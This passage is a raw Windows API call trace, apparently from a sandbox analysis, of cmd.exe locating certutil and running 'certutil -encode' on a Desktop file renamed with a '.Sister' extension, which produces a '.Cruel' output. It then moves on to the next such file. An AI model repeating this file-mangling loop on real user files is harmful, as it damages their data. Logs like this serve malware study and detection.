(_FileHandle=1) returned 0x50 [0228.958] GetFileType (hFile=0x50) returned 0x2 [0228.958] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0228.958] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0229.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0229.032] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x30) returned 1 [0229.145] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0229.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0229.145] GetFileType (hFile=0x50) returned 0x2 [0229.145] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0229.145] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0229.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0229.215] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0229.319] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0229.395] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0229.395] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0229.395] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0229.395] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0229.395] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0229.395] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0229.395] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0229.395] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0229.395] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0229.395] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0229.395] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0229.395] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0229.395] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0229.396] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0229.396] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0229.396] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0229.396] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0229.396] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0229.396] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0229.396] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0229.396] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0229.396] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0229.396] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0229.396] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0229.396] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0229.396] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0229.396] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0229.396] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0229.396] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0229.396] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0229.396] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0229.396] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0229.396] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0229.396] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0229.396] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0229.396] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0229.396] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0229.396] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0229.396] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0229.396] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0229.396] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0229.396] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0229.396] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0229.396] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0229.396] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0229.397] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0229.397] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0229.397] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0229.397] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0229.397] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0229.397] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0229.397] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0229.397] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0229.397] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0229.397] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0229.397] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0229.397] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0229.397] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0229.397] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0229.397] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0229.397] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0229.397] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0229.397] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0229.397] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0229.397] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0229.397] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0229.397] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0229.397] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0229.397] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0229.397] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0229.397] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0229.397] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0229.397] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0229.397] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0229.397] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0229.397] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0229.398] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0229.398] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0229.398] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0229.398] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0229.398] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0229.398] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0229.398] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0229.398] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0229.398] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0229.398] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0229.398] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0229.398] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0229.398] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0229.398] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0229.398] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0229.398] ??_V@YAXPEAX@Z () returned 0x1 [0229.398] GetProcessHeap () returned 0x21ed8c70000 [0229.398] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92a1150 [0229.398] GetProcessHeap () returned 0x21ed8c70000 [0229.398] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x82) returned 0x21ed93799c0 [0229.398] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0229.398] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0229.398] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0229.398] GetProcessHeap () returned 0x21ed8c70000 [0229.398] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed92b1140 [0229.399] SetErrorMode (uMode=0x0) returned 0x0 [0229.399] SetErrorMode (uMode=0x1) returned 0x0 [0229.400] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed92b1150, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0229.400] SetErrorMode (uMode=0x0) returned 0x1 [0229.400] GetProcessHeap () returned 0x21ed8c70000 [0229.400] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92b1140, Size=0x52) returned 0x21ed92b1140 [0229.400] GetProcessHeap () returned 0x21ed8c70000 [0229.400] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92b1140) returned 0x52 [0229.400] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0229.400] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0229.400] GetProcessHeap () returned 0x21ed8c70000 [0229.400] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5f640 [0229.400] GetProcessHeap () returned 0x21ed8c70000 [0229.400] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8c76370 [0229.400] GetProcessHeap () returned 0x21ed8c70000 [0229.400] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c76370, Size=0x1be) returned 0x21ed8c76370 [0229.400] GetProcessHeap () returned 0x21ed8c70000 [0229.400] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c76370) returned 0x1be [0229.400] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0229.400] GetProcessHeap () returned 0x21ed8c70000 [0229.400] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed9980ec0 [0229.400] GetProcessHeap () returned 0x21ed8c70000 [0229.400] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980ec0, Size=0x7e) returned 0x21ed9980ec0 [0229.400] GetProcessHeap () returned 0x21ed8c70000 [0229.400] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980ec0) returned 0x7e [0229.400] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0229.401] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0229.401] GetLastError () returned 0x2 [0229.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0229.401] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0229.401] GetLastError () returned 0x2 [0229.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0229.401] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0229.401] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0229.402] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0229.402] GetLastError () returned 0x2 [0229.402] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0229.402] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0229.402] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0229.402] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0229.402] ??_V@YAXPEAX@Z () returned 0x1 [0229.402] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0229.473] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0229.473] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0229.473] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0229.473] GetProcessHeap () returned 0x21ed8c70000 [0229.473] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45da0 [0229.473] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0229.473] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0229.473] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0229.473] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0229.474] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0229.475] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0229.475] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0229.475] GetProcessHeap () returned 0x21ed8c70000 [0229.475] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45da0) returned 1 [0229.475] GetProcessHeap () returned 0x21ed8c70000 [0229.475] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c954e0 [0229.475] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0229.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0229.475] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0229.544] _get_osfhandle (_FileHandle=0) returned 0x4c [0229.544] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0229.634] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"jQv-1A.gif.Sister\" \"jQv-1A.gif.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"jQv-1A.gif.Sister\" \"jQv-1A.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"jQv-1A.gif.Sister\" \"jQv-1A.gif.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xec8, dwThreadId=0xf3c)) returned 1 [0229.643] CloseHandle (hObject=0xa4) returned 1 [0229.643] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0229.643] GetProcessHeap () returned 0x21ed8c70000 [0229.643] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0229.643] GetEnvironmentStringsW () returned 0x21ed93b0130* [0229.643] GetProcessHeap () returned 0x21ed8c70000 [0229.643] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed9980080 [0229.643] FreeEnvironmentStringsA (penv="=") returned 1 [0229.643] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0231.472] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0231.472] CloseHandle (hObject=0xa8) returned 1 [0231.472] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0231.472] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0231.472] GetProcessHeap () returned 0x21ed8c70000 [0231.472] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0231.472] GetEnvironmentStringsW () returned 0x21ed9980080* [0231.473] GetProcessHeap () returned 0x21ed8c70000 [0231.473] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0231.473] FreeEnvironmentStringsA (penv="=") returned 1 [0231.473] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0231.473] GetProcessHeap () returned 0x21ed8c70000 [0231.473] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0231.473] GetEnvironmentStringsW () returned 0x21ed93b0130* [0231.473] GetProcessHeap () returned 0x21ed8c70000 [0231.473] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed9980080 [0231.473] FreeEnvironmentStringsA (penv="=") returned 1 [0231.473] GetProcessHeap () returned 0x21ed8c70000 [0231.473] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c954e0) returned 1 [0231.473] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0231.474] ??_V@YAXPEAX@Z () returned 0x1 [0231.474] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41f92750, ftCreationTime.dwHighDateTime=0x1d5eb7b, ftLastAccessTime.dwLowDateTime=0xd2a616e0, ftLastAccessTime.dwHighDateTime=0x1d5ea6e, ftLastWriteTime.dwLowDateTime=0xd2a616e0, ftLastWriteTime.dwHighDateTime=0x1d5ea6e, nFileSizeHigh=0x0, nFileSizeLow=0x14f69, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="JyNR.mp3.Sister", cAlternateFileName="")) returned 1 [0231.474] GetProcessHeap () returned 0x21ed8c70000 [0231.474] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0c80, Size=0x328) returned 0x21ed93b0c80 [0231.474] GetProcessHeap () returned 0x21ed8c70000 [0231.474] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0c80) returned 0x328 [0231.474] GetProcessHeap () returned 0x21ed8c70000 [0231.474] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68b50 [0231.474] GetProcessHeap () returned 0x21ed8c70000 [0231.474] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68b50, Size=0x58) returned 0x21ed8d68b50 [0231.474] GetProcessHeap () returned 0x21ed8c70000 [0231.474] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68b50) returned 0x58 [0231.474] GetProcessHeap () returned 0x21ed8c70000 [0231.474] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68bc0 [0231.474] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0231.474] GetProcessHeap () returned 0x21ed8c70000 [0231.474] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x30) returned 0x21ed8cc8990 [0231.474] ??_V@YAXPEAX@Z () returned 0x1 [0231.474] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0231.475] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cb80 [0231.475] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0231.475] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0231.475] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0231.476] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb42f9f3f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb42f9f3f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cbe0 [0231.476] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0231.476] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\JyNR.mp3.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41f92750, ftCreationTime.dwHighDateTime=0x1d5eb7b, ftLastAccessTime.dwLowDateTime=0xd2a616e0, ftLastAccessTime.dwHighDateTime=0x1d5ea6e, ftLastWriteTime.dwLowDateTime=0xd2a616e0, ftLastWriteTime.dwHighDateTime=0x1d5ea6e, nFileSizeHigh=0x0, nFileSizeLow=0x14f69, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="JyNR.mp3.Sister", cAlternateFileName="JYNRMP~1.SIS")) returned 